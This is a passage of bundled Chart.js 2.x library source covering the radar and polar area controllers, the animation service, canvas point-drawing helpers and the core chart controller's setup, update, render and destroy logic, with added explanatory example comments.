Chart.DatasetController.prototype.removeHoverStyle.call(this, arc, this.chart.options.elements.arc);
},
countVisibleElements: function () {
var dataset = this.getDataset();
var meta = this.getMeta();
var count = 0;
helpers.each(meta.data, function (element, index) {
if (!isNaN(dataset.data[index]) && !element.hidden) {
count++;
}
});
return count;
},
calculateCircumference: function (value) {
var count = this.getMeta().count;
if (count > 0 && !isNaN(value)) {
return (2 * Math.PI) / count;
}
return 0;
}
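// Worked example (illustrative): unlike the doughnut controller, every visible
// polar area slice gets an equal angle. With 4 visible, non-NaN values,
// calculateCircumference returns (2 * Math.PI) / 4 = Math.PI / 2 per slice;
// the data value only affects the slice radius, via getDistanceFromCenterForValue.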
});
};
}, {}], 20: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.defaults.radar = {
aspectRatio: 1,
scale: {
type: 'radialLinear'
},
elements: {
line: {
tension: 0 // no bezier in radar
}
}
};
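// Example (illustrative): radar charts default to tension 0 (straight lines
// between points); to restore bezier curves, set lineTension on the dataset,
// e.g. datasets: [{data: [3, 5, 2], lineTension: 0.4}].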
Chart.controllers.radar = Chart.DatasetController.extend({
datasetElementType: Chart.elements.Line,
dataElementType: Chart.elements.Point,
linkScales: helpers.noop,
update: function (reset) {
var me = this;
var meta = me.getMeta();
var line = meta.dataset;
var points = meta.data;
var custom = line.custom || {};
var dataset = me.getDataset();
var lineElementOptions = me.chart.options.elements.line;
var scale = me.chart.scale;
// Compatibility: If the properties are defined with only the old name, use those values
if ((dataset.tension !== undefined) && (dataset.lineTension === undefined)) {
dataset.lineTension = dataset.tension;
}
helpers.extend(meta.dataset, {
// Utility
_datasetIndex: me.index,
// Data
_children: points,
_loop: true,
// Model
_model: {
// Appearance
tension: custom.tension ? custom.tension : helpers.getValueOrDefault(dataset.lineTension, lineElementOptions.tension),
backgroundColor: custom.backgroundColor ? custom.backgroundColor : (dataset.backgroundColor || lineElementOptions.backgroundColor),
borderWidth: custom.borderWidth ? custom.borderWidth : (dataset.borderWidth || lineElementOptions.borderWidth),
borderColor: custom.borderColor ? custom.borderColor : (dataset.borderColor || lineElementOptions.borderColor),
fill: custom.fill ? custom.fill : (dataset.fill !== undefined ? dataset.fill : lineElementOptions.fill),
borderCapStyle: custom.borderCapStyle ? custom.borderCapStyle : (dataset.borderCapStyle || lineElementOptions.borderCapStyle),
borderDash: custom.borderDash ? custom.borderDash : (dataset.borderDash || lineElementOptions.borderDash),
borderDashOffset: custom.borderDashOffset ? custom.borderDashOffset : (dataset.borderDashOffset || lineElementOptions.borderDashOffset),
borderJoinStyle: custom.borderJoinStyle ? custom.borderJoinStyle : (dataset.borderJoinStyle || lineElementOptions.borderJoinStyle),
// Scale
scaleTop: scale.top,
scaleBottom: scale.bottom,
scaleZero: scale.getBasePosition()
}
});
meta.dataset.pivot();
// Update Points
helpers.each(points, function (point, index) {
me.updateElement(point, index, reset);
}, me);
// Update bezier control points
me.updateBezierControlPoints();
},
updateElement: function (point, index, reset) {
var me = this;
var custom = point.custom || {};
var dataset = me.getDataset();
var scale = me.chart.scale;
var pointElementOptions = me.chart.options.elements.point;
var pointPosition = scale.getPointPositionForValue(index, dataset.data[index]);
helpers.extend(point, {
// Utility
_datasetIndex: me.index,
_index: index,
_scale: scale,
// Desired view properties
_model: {
x: reset ? scale.xCenter : pointPosition.x, // value not used in dataset scale, but we want a consistent API between scales
y: reset ? scale.yCenter : pointPosition.y,
// Appearance
tension: custom.tension ? custom.tension : helpers.getValueOrDefault(dataset.tension, me.chart.options.elements.line.tension),
radius: custom.radius ? custom.radius : helpers.getValueAtIndexOrDefault(dataset.pointRadius, index, pointElementOptions.radius),
backgroundColor: custom.backgroundColor ? custom.backgroundColor : helpers.getValueAtIndexOrDefault(dataset.pointBackgroundColor, index, pointElementOptions.backgroundColor),
borderColor: custom.borderColor ? custom.borderColor : helpers.getValueAtIndexOrDefault(dataset.pointBorderColor, index, pointElementOptions.borderColor),
borderWidth: custom.borderWidth ? custom.borderWidth : helpers.getValueAtIndexOrDefault(dataset.pointBorderWidth, index, pointElementOptions.borderWidth),
pointStyle: custom.pointStyle ? custom.pointStyle : helpers.getValueAtIndexOrDefault(dataset.pointStyle, index, pointElementOptions.pointStyle),
// Tooltip
hitRadius: custom.hitRadius ? custom.hitRadius : helpers.getValueAtIndexOrDefault(dataset.hitRadius, index, pointElementOptions.hitRadius)
}
});
point._model.skip = custom.skip ? custom.skip : (isNaN(point._model.x) || isNaN(point._model.y));
},
updateBezierControlPoints: function () {
var chartArea = this.chart.chartArea;
var meta = this.getMeta();
helpers.each(meta.data, function (point, index) {
var model = point._model;
var controlPoints = helpers.splineCurve(
helpers.previousItem(meta.data, index, true)._model,
model,
helpers.nextItem(meta.data, index, true)._model,
model.tension
);
// Prevent the bezier going outside of the bounds of the graph
model.controlPointPreviousX = Math.max(Math.min(controlPoints.previous.x, chartArea.right), chartArea.left);
model.controlPointPreviousY = Math.max(Math.min(controlPoints.previous.y, chartArea.bottom), chartArea.top);
model.controlPointNextX = Math.max(Math.min(controlPoints.next.x, chartArea.right), chartArea.left);
model.controlPointNextY = Math.max(Math.min(controlPoints.next.y, chartArea.bottom), chartArea.top);
// Now pivot the point for animation
point.pivot();
});
},
draw: function (ease) {
var meta = this.getMeta();
var easingDecimal = ease || 1;
// Transition Point Locations
helpers.each(meta.data, function (point) {
point.transition(easingDecimal);
});
// Transition and Draw the line
meta.dataset.transition(easingDecimal).draw();
// Draw the points
helpers.each(meta.data, function (point) {
point.draw();
});
},
setHoverStyle: function (point) {
// Point
var dataset = this.chart.data.datasets[point._datasetIndex];
var custom = point.custom || {};
var index = point._index;
var model = point._model;
model.radius = custom.hoverRadius ? custom.hoverRadius : helpers.getValueAtIndexOrDefault(dataset.pointHoverRadius, index, this.chart.options.elements.point.hoverRadius);
model.backgroundColor = custom.hoverBackgroundColor ? custom.hoverBackgroundColor : helpers.getValueAtIndexOrDefault(dataset.pointHoverBackgroundColor, index, helpers.getHoverColor(model.backgroundColor));
model.borderColor = custom.hoverBorderColor ? custom.hoverBorderColor : helpers.getValueAtIndexOrDefault(dataset.pointHoverBorderColor, index, helpers.getHoverColor(model.borderColor));
model.borderWidth = custom.hoverBorderWidth ? custom.hoverBorderWidth : helpers.getValueAtIndexOrDefault(dataset.pointHoverBorderWidth, index, model.borderWidth);
},
removeHoverStyle: function (point) {
var dataset = this.chart.data.datasets[point._datasetIndex];
var custom = point.custom || {};
var index = point._index;
var model = point._model;
var pointElementOptions = this.chart.options.elements.point;
model.radius = custom.radius ? custom.radius : helpers.getValueAtIndexOrDefault(dataset.radius, index, pointElementOptions.radius);
model.backgroundColor = custom.backgroundColor ? custom.backgroundColor : helpers.getValueAtIndexOrDefault(dataset.pointBackgroundColor, index, pointElementOptions.backgroundColor);
model.borderColor = custom.borderColor ? custom.borderColor : helpers.getValueAtIndexOrDefault(dataset.pointBorderColor, index, pointElementOptions.borderColor);
model.borderWidth = custom.borderWidth ? custom.borderWidth : helpers.getValueAtIndexOrDefault(dataset.pointBorderWidth, index, pointElementOptions.borderWidth);
}
});
};
}, {}], 21: [function (require, module, exports) {
/* global window: false */
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.defaults.global.animation = {
duration: 1000,
easing: 'easeOutQuart',
onProgress: helpers.noop,
onComplete: helpers.noop
};
Chart.Animation = Chart.Element.extend({
currentStep: null, // the current animation step
numSteps: 60, // default number of steps
easing: '', // the easing to use for this animation
render: null, // render function used by the animation service
onAnimationProgress: null, // user specified callback to fire on each step of the animation
onAnimationComplete: null // user specified callback to fire when the animation finishes
});
Chart.animationService = {
frameDuration: 17,
animations: [],
dropFrames: 0,
request: null,
/**
* @function Chart.animationService.addAnimation
* @param chartInstance {ChartController} the chart to animate
* @param animationObject {IAnimation} the animation that we will animate
* @param duration {Number} length of animation in ms
* @param lazy {Boolean} if true, the chart is not marked as animating to enable more responsive interactions
*/
addAnimation: function (chartInstance, animationObject, duration, lazy) {
var me = this;
if (!lazy) {
chartInstance.animating = true;
}
for (var index = 0; index < me.animations.length; ++index) {
if (me.animations[index].chartInstance === chartInstance) {
// replacing an in-progress animation
me.animations[index].animationObject = animationObject;
return;
}
}
me.animations.push({
chartInstance: chartInstance,
animationObject: animationObject
});
// If there are no animations queued, manually kickstart a digest, for lack of a better word
if (me.animations.length === 1) {
me.requestAnimationFrame();
}
},
// Cancel the animation for a given chart instance
cancelAnimation: function (chartInstance) {
var index = helpers.findIndex(this.animations, function (animationWrapper) {
return animationWrapper.chartInstance === chartInstance;
});
if (index !== -1) {
this.animations.splice(index, 1);
chartInstance.animating = false;
}
},
requestAnimationFrame: function () {
var me = this;
if (me.request === null) {
// Skip animation frame requests until the active one is executed.
// This can happen when processing mouse events, e.g. 'mousemove'
// and 'mouseout' events will trigger multiple renders.
me.request = helpers.requestAnimFrame.call(window, function () {
me.request = null;
me.startDigest();
});
}
},
startDigest: function () {
var me = this;
var startTime = Date.now();
var framesToDrop = 0;
if (me.dropFrames > 1) {
framesToDrop = Math.floor(me.dropFrames);
me.dropFrames = me.dropFrames % 1;
}
var i = 0;
while (i < me.animations.length) {
if (me.animations[i].animationObject.currentStep === null) {
me.animations[i].animationObject.currentStep = 0;
}
me.animations[i].animationObject.currentStep += 1 + framesToDrop;
if (me.animations[i].animationObject.currentStep > me.animations[i].animationObject.numSteps) {
me.animations[i].animationObject.currentStep = me.animations[i].animationObject.numSteps;
}
me.animations[i].animationObject.render(me.animations[i].chartInstance, me.animations[i].animationObject);
if (me.animations[i].animationObject.onAnimationProgress && me.animations[i].animationObject.onAnimationProgress.call) {
me.animations[i].animationObject.onAnimationProgress.call(me.animations[i].chartInstance, me.animations[i]);
}
if (me.animations[i].animationObject.currentStep === me.animations[i].animationObject.numSteps) {
if (me.animations[i].animationObject.onAnimationComplete && me.animations[i].animationObject.onAnimationComplete.call) {
me.animations[i].animationObject.onAnimationComplete.call(me.animations[i].chartInstance, me.animations[i]);
}
// executed the last frame. Remove the animation.
me.animations[i].chartInstance.animating = false;
me.animations.splice(i, 1);
} else {
++i;
}
}
var endTime = Date.now();
var dropFrames = (endTime - startTime) / me.frameDuration;
me.dropFrames += dropFrames;
// Do we have more stuff to animate?
if (me.animations.length > 0) {
me.requestAnimationFrame();
}
}
};
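// Worked example (illustrative): frameDuration is 17ms (~60fps). If one digest
// takes 51ms, dropFrames increases by 51 / 17 = 3, so the next digest advances
// every animation by Math.floor(3) extra steps (framesToDrop) and carries the
// fractional remainder forward in dropFrames -- keeping the total animation
// duration roughly stable even when frames are slow.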
};
}, {}], 22: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
// Global Chart canvas helpers object for drawing items to canvas
var helpers = Chart.canvasHelpers = {};
helpers.drawPoint = function (ctx, pointStyle, radius, x, y) {
var type, edgeLength, xOffset, yOffset, height, size;
if (typeof pointStyle === 'object') {
type = pointStyle.toString();
if (type === '[object HTMLImageElement]' || type === '[object HTMLCanvasElement]') {
ctx.drawImage(pointStyle, x - pointStyle.width / 2, y - pointStyle.height / 2);
return;
}
}
if (isNaN(radius) || radius <= 0) {
return;
}
switch (pointStyle) {
// Default includes circle
default:
ctx.beginPath();
ctx.arc(x, y, radius, 0, Math.PI * 2);
ctx.closePath();
ctx.fill();
break;
case 'triangle':
ctx.beginPath();
edgeLength = 3 * radius / Math.sqrt(3);
height = edgeLength * Math.sqrt(3) / 2;
ctx.moveTo(x - edgeLength / 2, y + height / 3);
ctx.lineTo(x + edgeLength / 2, y + height / 3);
ctx.lineTo(x, y - 2 * height / 3);
ctx.closePath();
ctx.fill();
break;
case 'rect':
size = 1 / Math.SQRT2 * radius;
ctx.beginPath();
ctx.fillRect(x - size, y - size, 2 * size, 2 * size);
ctx.strokeRect(x - size, y - size, 2 * size, 2 * size);
break;
case 'rectRot':
size = 1 / Math.SQRT2 * radius;
ctx.beginPath();
ctx.moveTo(x - size, y);
ctx.lineTo(x, y + size);
ctx.lineTo(x + size, y);
ctx.lineTo(x, y - size);
ctx.closePath();
ctx.fill();
break;
case 'cross':
ctx.beginPath();
ctx.moveTo(x, y + radius);
ctx.lineTo(x, y - radius);
ctx.moveTo(x - radius, y);
ctx.lineTo(x + radius, y);
ctx.closePath();
break;
case 'crossRot':
ctx.beginPath();
xOffset = Math.cos(Math.PI / 4) * radius;
yOffset = Math.sin(Math.PI / 4) * radius;
ctx.moveTo(x - xOffset, y - yOffset);
ctx.lineTo(x + xOffset, y + yOffset);
ctx.moveTo(x - xOffset, y + yOffset);
ctx.lineTo(x + xOffset, y - yOffset);
ctx.closePath();
break;
case 'star':
ctx.beginPath();
ctx.moveTo(x, y + radius);
ctx.lineTo(x, y - radius);
ctx.moveTo(x - radius, y);
ctx.lineTo(x + radius, y);
xOffset = Math.cos(Math.PI / 4) * radius;
yOffset = Math.sin(Math.PI / 4) * radius;
ctx.moveTo(x - xOffset, y - yOffset);
ctx.lineTo(x + xOffset, y + yOffset);
ctx.moveTo(x - xOffset, y + yOffset);
ctx.lineTo(x + xOffset, y - yOffset);
ctx.closePath();
break;
case 'line':
ctx.beginPath();
ctx.moveTo(x - radius, y);
ctx.lineTo(x + radius, y);
ctx.closePath();
break;
case 'dash':
ctx.beginPath();
ctx.moveTo(x, y);
ctx.lineTo(x + radius, y);
ctx.closePath();
break;
}
ctx.stroke();
};
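// Example usage (illustrative, not part of the library):
//
// var ctx = document.getElementById('canvas').getContext('2d');
// ctx.fillStyle = 'rgba(54, 162, 235, 0.5)';
// Chart.canvasHelpers.drawPoint(ctx, 'rectRot', 6, 50, 50); // filled rotated square
// Chart.canvasHelpers.drawPoint(ctx, 'cross', 6, 80, 50);   // stroked cross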
};
}, {}], 23: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
// Create a dictionary of chart types, to allow for extension of existing types
Chart.types = {};
// Store a reference to each instance - allowing us to globally resize chart instances on window resize.
// Destroy method on the chart will remove the instance of the chart from this reference.
Chart.instances = {};
// Controllers available for dataset visualization, e.g. bar, line, slice, etc.
Chart.controllers = {};
/**
* The "used" size is the final value of a dimension property after all calculations have
* been performed. This method uses the computed style of `element` but returns undefined
* if the computed style is not expressed in pixels. That can happen in some cases where
* `element` has a size relative to its parent and the parent is not yet displayed,
* for example because of `display: none` on a parent node.
* TODO(SB) Move this method into the upcoming core.platform class.
* @see https://developer.mozilla.org/en-US/docs/Web/CSS/used_value
* @returns {Number} Size in pixels or undefined if unknown.
*/
function readUsedSize(element, property) {
var value = helpers.getStyle(element, property);
var matches = value && value.match(/(\d+)px/);
return matches ? Number(matches[1]) : undefined;
}
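// Example (illustrative): if the computed style reports width as '300px',
// readUsedSize(canvas, 'width') returns 300; if it reports '50%' (parent not
// yet laid out), the regex does not match and undefined is returned.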
/**
* Initializes the canvas style and render size without modifying the canvas display size,
* since responsiveness is handled by the controller.resize() method. The config is used
* to determine the aspect ratio to apply in case no explicit height has been specified.
* TODO(SB) Move this method into the upcoming core.platform class.
*/
function initCanvas(canvas, config) {
var style = canvas.style;
// NOTE(SB) canvas.getAttribute('width') !== canvas.width: in the first case it
// returns null or '' if no explicit value has been set to the canvas attribute.
var renderHeight = canvas.getAttribute('height');
var renderWidth = canvas.getAttribute('width');
// Chart.js modifies some canvas values that we want to restore on destroy
canvas._chartjs = {
initial: {
height: renderHeight,
width: renderWidth,
style: {
display: style.display,
height: style.height,
width: style.width
}
}
};
// Force canvas to display as block to avoid extra space caused by inline
// elements, which would interfere with the responsive resize process.
// https://github.com/chartjs/Chart.js/issues/2538
style.display = style.display || 'block';
if (renderWidth === null || renderWidth === '') {
var displayWidth = readUsedSize(canvas, 'width');
if (displayWidth !== undefined) {
canvas.width = displayWidth;
}
}
if (renderHeight === null || renderHeight === '') {
if (canvas.style.height === '') {
// If there is no explicit render height and no style height, apply the aspect
// ratio, which can be specified by the user or by the chart type as a default
// option (i.e. options.aspectRatio). If not specified, use a canvas aspect ratio of 2.
canvas.height = canvas.width / (config.options.aspectRatio || 2);
} else {
var displayHeight = readUsedSize(canvas, 'height');
if (displayHeight !== undefined) {
canvas.height = displayHeight;
}
}
}
return canvas;
}
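// Worked example (illustrative): for <canvas width="600"> with no height
// attribute and no style height, initCanvas sets canvas.height to
// 600 / (config.options.aspectRatio || 2) = 300, so charts default to a
// 2:1 aspect ratio unless configured otherwise.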
/**
* Restores the canvas initial state, such as render/display sizes and style.
* TODO(SB) Move this method into the upcoming core.platform class.
*/
function releaseCanvas(canvas) {
if (!canvas._chartjs) {
return;
}
var initial = canvas._chartjs.initial;
['height', 'width'].forEach(function (prop) {
var value = initial[prop];
if (value === undefined || value === null) {
canvas.removeAttribute(prop);
} else {
canvas.setAttribute(prop, value);
}
});
helpers.each(initial.style || {}, function (value, key) {
canvas.style[key] = value;
});
// The canvas render size might have been changed (and thus the state stack discarded),
// we can't use save() and restore() to restore the initial state. So make sure that at
// least the canvas context is reset to the default state by setting the canvas width.
// https://www.w3.org/TR/2011/WD-html5-20110525/the-canvas-element.html
canvas.width = canvas.width;
delete canvas._chartjs;
}
/**
* TODO(SB) Move this method into the upcoming core.platform class.
*/
function acquireContext(item, config) {
if (typeof item === 'string') {
item = document.getElementById(item);
} else if (item.length) {
// Support for array based queries (such as jQuery)
item = item[0];
}
if (item && item.canvas) {
// Support for any object associated to a canvas (including a context2d)
item = item.canvas;
}
if (item instanceof HTMLCanvasElement) {
// To prevent canvas fingerprinting, some add-ons undefine the getContext
// method, for example: https://github.com/kkapsner/CanvasBlocker
// https://github.com/chartjs/Chart.js/issues/2807
var context = item.getContext && item.getContext('2d');
if (context instanceof CanvasRenderingContext2D) {
initCanvas(item, config);
return context;
}
}
return null;
}
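// Example (illustrative): all of these item shapes resolve to the same 2d context:
//
// acquireContext('myChart', config);                          // canvas id string
// acquireContext(document.getElementById('myChart'), config); // canvas element
// acquireContext($('#myChart'), config);                      // array-like (e.g. jQuery)
// acquireContext(canvas.getContext('2d'), config);            // anything with a .canvas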
/**
* Initializes the given config with global and chart default values.
*/
function initConfig(config) {
config = config || {};
// Do NOT use configMerge() for the data object because this method merges arrays
// and so would change references to labels and datasets, preventing data updates.
var data = config.data = config.data || {};
data.datasets = data.datasets || [];
data.labels = data.labels || [];
config.options = helpers.configMerge(
Chart.defaults.global,
Chart.defaults[config.type],
config.options || {});
return config;
}
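// Example (illustrative): option precedence after initConfig is
// Chart.defaults.global < Chart.defaults[config.type] < config.options.
// E.g. for {type: 'line', options: {showLines: false}}, the merged options
// keep the global animation defaults but showLines resolves to false.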
/**
* @class Chart.Controller
* The main controller of a chart.
*/
Chart.Controller = function (item, config, instance) {
var me = this;
config = initConfig(config);
var context = acquireContext(item, config);
var canvas = context && context.canvas;
var height = canvas && canvas.height;
var width = canvas && canvas.width;
instance.ctx = context;
instance.canvas = canvas;
instance.config = config;
instance.width = width;
instance.height = height;
instance.aspectRatio = height ? width / height : null;
me.id = helpers.uid();
me.chart = instance;
me.config = config;
me.options = config.options;
me._bufferedRender = false;
// Add the chart instance to the global namespace
Chart.instances[me.id] = me;
Object.defineProperty(me, 'data', {
get: function () {
return me.config.data;
}
});
if (!context || !canvas) {
// The given item is not a compatible context2d element, let's return before finalizing
// the chart initialization but after setting basic chart / controller properties that
// can help to figure out that the chart is not valid (e.g. chart.canvas !== null);
// https://github.com/chartjs/Chart.js/issues/2807
console.error("Failed to create chart: can't acquire context from the given item");
return me;
}
helpers.retinaScale(instance);
// Responsiveness is currently based on the use of an iframe; however, this method causes
// performance issues and could be troublesome when used with ad blockers. So make sure
// that the user is still able to create a chart without iframe when responsive is false.
// See https://github.com/chartjs/Chart.js/issues/2210
if (me.options.responsive) {
helpers.addResizeListener(canvas.parentNode, function () {
me.resize();
});
// Initial resize before chart draws (must be silent to preserve initial animations).
me.resize(true);
}
me.initialize();
return me;
};
helpers.extend(Chart.Controller.prototype, /** @lends Chart.Controller */ {
initialize: function () {
var me = this;
// Before init plugin notification
Chart.plugins.notify('beforeInit', [me]);
me.bindEvents();
// Make sure controllers are built first so that each dataset is bound to an axis before the scales
// are built
me.ensureScalesHaveIDs();
me.buildOrUpdateControllers();
me.buildScales();
me.updateLayout();
me.resetElements();
me.initToolTip();
me.update();
// After init plugin notification
Chart.plugins.notify('afterInit', [me]);
return me;
},
clear: function () {
helpers.clear(this.chart);
return this;
},
stop: function () {
// Stops any current animation loop occurring
Chart.animationService.cancelAnimation(this);
return this;
},
resize: function (silent) {
var me = this;
var chart = me.chart;
var options = me.options;
var canvas = chart.canvas;
var aspectRatio = (options.maintainAspectRatio && chart.aspectRatio) || null;
// the canvas render width and height will be cast to integers, so make sure that
// the canvas display style uses the same integer values to avoid blurring effect.
var newWidth = Math.floor(helpers.getMaximumWidth(canvas));
var newHeight = Math.floor(aspectRatio ? newWidth / aspectRatio : helpers.getMaximumHeight(canvas));
if (chart.width === newWidth && chart.height === newHeight) {
return;
}
canvas.width = chart.width = newWidth;
canvas.height = chart.height = newHeight;
canvas.style.width = newWidth + 'px';
canvas.style.height = newHeight + 'px';
helpers.retinaScale(chart);
// Notify any plugins about the resize
var newSize = {width: newWidth, height: newHeight};
Chart.plugins.notify('resize', [me, newSize]);
// Notify of resize
if (me.options.onResize) {
me.options.onResize(me, newSize);
}
if (!silent) {
me.stop();
me.update(me.options.responsiveAnimationDuration);
}
},
ensureScalesHaveIDs: function () {
var options = this.options;
var scalesOptions = options.scales || {};
var scaleOptions = options.scale;
helpers.each(scalesOptions.xAxes, function (xAxisOptions, index) {
xAxisOptions.id = xAxisOptions.id || ('x-axis-' + index);
});
helpers.each(scalesOptions.yAxes, function (yAxisOptions, index) {
yAxisOptions.id = yAxisOptions.id || ('y-axis-' + index);
});
if (scaleOptions) {
scaleOptions.id = scaleOptions.id || 'scale';
}
},
/**
* Builds a map of scale ID to scale object for future lookup.
*/
buildScales: function () {
var me = this;
var options = me.options;
var scales = me.scales = {};
var items = [];
if (options.scales) {
items = items.concat(
(options.scales.xAxes || []).map(function (xAxisOptions) {
return {options: xAxisOptions, dtype: 'category'};
}),
(options.scales.yAxes || []).map(function (yAxisOptions) {
return {options: yAxisOptions, dtype: 'linear'};
})
);
}
if (options.scale) {
items.push({options: options.scale, dtype: 'radialLinear', isDefault: true});
}
helpers.each(items, function (item) {
var scaleOptions = item.options;
var scaleType = helpers.getValueOrDefault(scaleOptions.type, item.dtype);
var scaleClass = Chart.scaleService.getScaleConstructor(scaleType);
if (!scaleClass) {
return;
}
var scale = new scaleClass({
id: scaleOptions.id,
options: scaleOptions,
ctx: me.chart.ctx,
chart: me
});
scales[scale.id] = scale;
// TODO(SB): I think we should be able to remove this custom case (options.scale)
// and consider it as a regular scale part of the "scales" map only! This would
// make the logic easier and remove some arguably useless custom code.
if (item.isDefault) {
me.scale = scale;
}
});
Chart.scaleService.addScalesToLayout(this);
},
updateLayout: function () {
Chart.layoutService.update(this, this.chart.width, this.chart.height);
},
buildOrUpdateControllers: function () {
var me = this;
var types = [];
var newControllers = [];
helpers.each(me.data.datasets, function (dataset, datasetIndex) {
var meta = me.getDatasetMeta(datasetIndex);
if (!meta.type) {
meta.type = dataset.type || me.config.type;
}
types.push(meta.type);
if (meta.controller) {
meta.controller.updateIndex(datasetIndex);
} else {
meta.controller = new Chart.controllers[meta.type](me, datasetIndex);
newControllers.push(meta.controller);
}
}, me);
if (types.length > 1) {
for (var i = 1; i < types.length; i++) {
if (types[i] !== types[i - 1]) {
me.isCombo = true;
break;
}
}
}
return newControllers;
},
/**
* Reset the elements of all datasets
* @method resetElements
* @private
*/
resetElements: function () {
var me = this;
helpers.each(me.data.datasets, function (dataset, datasetIndex) {
me.getDatasetMeta(datasetIndex).controller.reset();
}, me);
},
/**
* Resets the chart back to its state before the initial animation
* @method reset
*/
reset: function () {
this.resetElements();
this.tooltip.initialize();
},
update: function (animationDuration, lazy) {
var me = this;
Chart.plugins.notify('beforeUpdate', [me]);
// In case the entire data object changed
me.tooltip._data = me.data;
// Make sure dataset controllers are updated and new controllers are reset
var newControllers = me.buildOrUpdateControllers();
// Make sure all dataset controllers have correct meta data counts
helpers.each(me.data.datasets, function (dataset, datasetIndex) {
me.getDatasetMeta(datasetIndex).controller.buildOrUpdateElements();
}, me);
Chart.layoutService.update(me, me.chart.width, me.chart.height);
// Apply changes to the datasets that require the scales to have been calculated, i.e. borderColor changes
Chart.plugins.notify('afterScaleUpdate', [me]);
// Can only reset the new controllers after the scales have been updated
helpers.each(newControllers, function (controller) {
controller.reset();
});
me.updateDatasets();
// Do this before render so that any plugins that need final scale updates can use it
Chart.plugins.notify('afterUpdate', [me]);
if (me._bufferedRender) {
me._bufferedRequest = {
lazy: lazy,
duration: animationDuration
};
} else {
me.render(animationDuration, lazy);
}
},
/**
* @method beforeDatasetsUpdate
* @description Called before all datasets are updated. If a plugin returns false,
* the datasets update will be cancelled until another chart update is triggered.
* @param {Object} instance the chart instance being updated.
* @returns {Boolean} false to cancel the datasets update.
* @memberof Chart.PluginBase
* @since version 2.1.5
* @instance
*/
/**
* @method afterDatasetsUpdate
* @description Called after all datasets have been updated. Note that this
* extension will not be called if the datasets update has been cancelled.
* @param {Object} instance the chart instance being updated.
* @memberof Chart.PluginBase
* @since version 2.1.5
* @instance
*/
/**
* Updates all datasets unless a plugin returns false to the beforeDatasetsUpdate
* extension, in which case no datasets will be updated and the afterDatasetsUpdate
* notification will be skipped.
* @protected
* @instance
*/
updateDatasets: function () {
var me = this;
var i, ilen;
if (Chart.plugins.notify('beforeDatasetsUpdate', [me])) {
for (i = 0, ilen = me.data.datasets.length; i < ilen; ++i) {
me.getDatasetMeta(i).controller.update();
}
Chart.plugins.notify('afterDatasetsUpdate', [me]);
}
},
render: function (duration, lazy) {
var me = this;
Chart.plugins.notify('beforeRender', [me]);
var animationOptions = me.options.animation;
if (animationOptions && ((typeof duration !== 'undefined' && duration !== 0) || (typeof duration === 'undefined' && animationOptions.duration !== 0))) {
var animation = new Chart.Animation();
animation.numSteps = (duration || animationOptions.duration) / 16.66; // 60 fps
animation.easing = animationOptions.easing;
// render function
animation.render = function (chartInstance, animationObject) {
var easingFunction = helpers.easingEffects[animationObject.easing];
var stepDecimal = animationObject.currentStep / animationObject.numSteps;
var easeDecimal = easingFunction(stepDecimal);
chartInstance.draw(easeDecimal, stepDecimal, animationObject.currentStep);
};
// user events
animation.onAnimationProgress = animationOptions.onProgress;
animation.onAnimationComplete = animationOptions.onComplete;
Chart.animationService.addAnimation(me, animation, duration, lazy);
} else {
me.draw();
if (animationOptions && animationOptions.onComplete && animationOptions.onComplete.call) {
animationOptions.onComplete.call(me);
}
}
return me;
},
draw: function (ease) {
var me = this;
var easingDecimal = ease || 1;
me.clear();
Chart.plugins.notify('beforeDraw', [me, easingDecimal]);
// Draw all the scales
helpers.each(me.boxes, function (box) {
box.draw(me.chartArea);
}, me);
if (me.scale) {
me.scale.draw();
}
Chart.plugins.notify('beforeDatasetsDraw', [me, easingDecimal]);
// Draw each dataset via its respective controller (reversed to support proper line stacking)
helpers.each(me.data.datasets, function (dataset, datasetIndex) {
if (me.isDatasetVisible(datasetIndex)) {
me.getDatasetMeta(datasetIndex).controller.draw(ease);
}
}, me, true);
Chart.plugins.notify('afterDatasetsDraw', [me, easingDecimal]);
// Finally draw the tooltip
me.tooltip.transition(easingDecimal).draw();
Chart.plugins.notify('afterDraw', [me, easingDecimal]);
},
// Get the single element that was clicked on
// @return : An object containing the dataset index and element index of the matching element. Also contains the rectangle that was drawn
getElementAtEvent: function (e) {
return Chart.Interaction.modes.single(this, e);
},
getElementsAtEvent: function (e) {
return Chart.Interaction.modes.label(this, e, {intersect: true});
},
getElementsAtXAxis: function (e) {
return Chart.Interaction.modes['x-axis'](this, e, {intersect: true});
},
getElementsAtEventForMode: function (e, mode, options) {
var method = Chart.Interaction.modes[mode];
if (typeof method === 'function') {
return method(this, e, options);
}
return [];
},
getDatasetAtEvent: function (e) {
return Chart.Interaction.modes.dataset(this, e);
},
getDatasetMeta: function (datasetIndex) {
var me = this;
var dataset = me.data.datasets[datasetIndex];
if (!dataset._meta) {
dataset._meta = {};
}
var meta = dataset._meta[me.id];
if (!meta) {
meta = dataset._meta[me.id] = {
type: null,
data: [],
dataset: null,
controller: null,
hidden: null, // See isDatasetVisible() comment
xAxisID: null,
yAxisID: null
};
}
return meta;
},
getVisibleDatasetCount: function () {
var count = 0;
for (var i = 0, ilen = this.data.datasets.length; i < ilen; ++i) {
if (this.isDatasetVisible(i)) {
count++;
}
}
return count;
},
isDatasetVisible: function (datasetIndex) {
var meta = this.getDatasetMeta(datasetIndex);
// meta.hidden is a per-chart dataset hidden flag override with 3 states: if true or false,
// it takes precedence and dataset.hidden is ignored; if null, the dataset.hidden state is returned.
return typeof meta.hidden === 'boolean' ? !meta.hidden : !this.data.datasets[datasetIndex].hidden;
},
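// Example (illustrative): the tri-state override in practice --
// isDatasetVisible(i) with meta.hidden === true  -> false (dataset.hidden ignored)
// isDatasetVisible(i) with meta.hidden === false -> true  (dataset.hidden ignored)
// isDatasetVisible(i) with meta.hidden === null  -> !dataset.hidden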
generateLegend: function () {
return this.options.legendCallback(this);
},
destroy: function () {
var me = this;
var canvas = me.chart.canvas;
var meta, i, ilen;
me.stop();
// dataset controllers need to cleanup associated data
for (i = 0, ilen = me.data.datasets.length; i < ilen; ++i) {
meta = me.getDatasetMeta(i);
if (meta.controller) {
meta.controller.destroy();
meta.controller = null;
}
}
if (canvas) {
helpers.unbindEvents(me, me.events);
helpers.removeResizeListener(canvas.parentNode);
helpers.clear(me.chart);
releaseCanvas(canvas);
me.chart.canvas = null;
me.chart.ctx = null;
}
Chart.plugins.notify('destroy', [me]);
delete Chart.instances[me.id];
},
toBase64Image: function () {
